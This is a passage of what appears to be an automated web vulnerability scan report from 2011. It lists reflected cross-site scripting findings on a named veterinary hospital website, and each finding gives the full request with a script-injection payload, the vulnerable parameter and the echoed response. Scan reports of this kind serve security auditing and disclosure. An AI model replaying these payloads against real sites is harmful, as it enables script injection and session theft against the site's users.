5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3da040b"><script>alert(1)</script>f73da84759e &useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:25 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=r8ti6pm5ktq8n70m0nl6japfn5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... 52bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3da040b"><script>alert(1)</script>f73da84759e &useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.79. http://www.vcahospitals.com/main/offer/ [useragent parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de3a3"><script>alert(1)</script>7d71969fe0c was submitted in the useragent parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)de3a3"><script>alert(1)</script>7d71969fe0c &variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:30 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=hmp8degbpu0a9te26g939re5u0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... 253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)de3a3"><script>alert(1)</script>7d71969fe0c &variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.80. http://www.vcahospitals.com/main/offer/ [variant parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the variant request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e180"><script>alert(1)</script>28aed0a1907 was submitted in the variant parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=1e180"><script>alert(1)</script>28aed0a1907 &zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:36 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=uonisgvh1t257tmgqd61oiinl5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... IE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=1e180"><script>alert(1)</script>28aed0a1907 &zip=" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.81. http://www.vcahospitals.com/main/offer/ [zip parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a500"><script>alert(1)</script>61d16eaa101 was submitted in the zip parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=9a500"><script>alert(1)</script>61d16eaa101 HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:40 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=lcvbtovbqbfupdtekad2l559v5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... 6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=9a500"><script>alert(1)</script>61d16eaa101 " method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.82. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/thank-you.html
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe76"><script>alert(1)</script>5ff898b7043 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/thank-you.htmlebe76"><script>alert(1)</script>5ff898b7043 ?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:22:58 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 15209 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/thank-you.htmlebe76"><script>alert(1)</script>5ff898b7043 ?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&stat...[SNIP]...
2.83. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/thank-you.html
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754ff"><script>alert(1)</script>e83ec5aaa248053f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /main/offer/thank-you.html754ff"><script>alert(1)</script>e83ec5aaa248053f6 ?fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&ipaddress=173.193.214.243&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&formtype=CORP&newmex=0&date=1307084400&tollfree=866-825-8416 HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:22:50 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 15197 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/thank-you.html754ff"><script>alert(1)</script>e83ec5aaa248053f6 ?fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=h...[SNIP]...
2.84. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 2]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /manhattan-veterinary-group/appt.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f764"><a>39ac731bfc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /manhattan-veterinary-group/appt.html4f764"><a>39ac731bfc3 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Mar 2011 12:46:42 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 Not Found Content-Type: text/html Content-Length: 9698 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]... <body id="appt4f764"><a>39ac731bfc3 ">...[SNIP]...
2.85. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /manhattan-veterinary-group/appt.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c5c9"><script>alert(1)</script>49734066e86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /manhattan-veterinary-group/appt.html?7c5c9"><script>alert(1)</script>49734066e86 =1 HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665
Response
